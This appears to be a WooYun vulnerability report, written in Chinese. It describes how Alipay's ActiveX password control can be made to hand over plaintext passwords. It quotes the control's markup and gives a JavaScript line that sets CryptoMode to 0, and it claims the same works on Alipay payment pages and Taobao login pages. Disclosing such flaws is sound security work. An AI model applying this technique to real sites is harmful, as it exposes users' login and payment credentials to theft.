WooYun.org

在https://www.alipay.com/看了下源代码，
找到了显示密码控件的那段代码：
<object id="_fmu.l._0.p_ie" name="_fmu.l._0.p_ie" width="194" height="24" tabindex="2" classid="clsid:488A4255-3236-44B3-8F27-FA1AECAA8844" codebase="https://download.alipay.com/aliedit/aliedit/2401/aliedit.cab#Version=1,1,0,0" >
其中:488A4255-3236-44B3-8F27-FA1AECAA8844是密码控件clsid值， _fmu.l._0.p_ie是ID
getElementById("_fmu.l._0.p_ie").innerHTML
获取到的以下代码
<PARAM NAME="_cx" VALUE="5133"><PARAM NAME="_cy" VALUE="635"><PARAM NAME="PasswordMode" VALUE="-1"><PARAM NAME="SecurityMode" VALUE="-1"><PARAM NAME="TextValue" VALUE="3DES_2_000000000000000000000000000000_FDB704F0F6FA87B7"><PARAM NAME="MaxLength" VALUE="20"><PARAM NAME="LogMode" VALUE="0"><PARAM NAME="TextData" VALUE="3DES_2_000000000000000000000000000000_FDB704F0F6FA87B7"><PARAM NAME="Readonly" VALUE="0"><PARAM NAME="CryptoMode" VALUE="4"><PARAM NAME="cm5ts" VALUE=""><PARAM NAME="cm5pk" VALUE="">
得到了数字1的加密内容3DES_2_000000000000000000000000000000_FDB704F0F6FA87B7
3DES是加密方式，FDB704F0F6FA87B7是加密后的密文。修改CryptoMode的值为0时表示密码输入不加密，这样就可以获取到密码明文！
getElementById("_fmu.l._0.p_ie").CryptoMode ="0"
经测试引用这个密码安全控件的支付宝登陆页面登陆密码，支付页面的支付密码，淘宝的登陆页面登陆密码，都可以用这种方法获取到密码明文！只是每个页面的ID值不一样而已!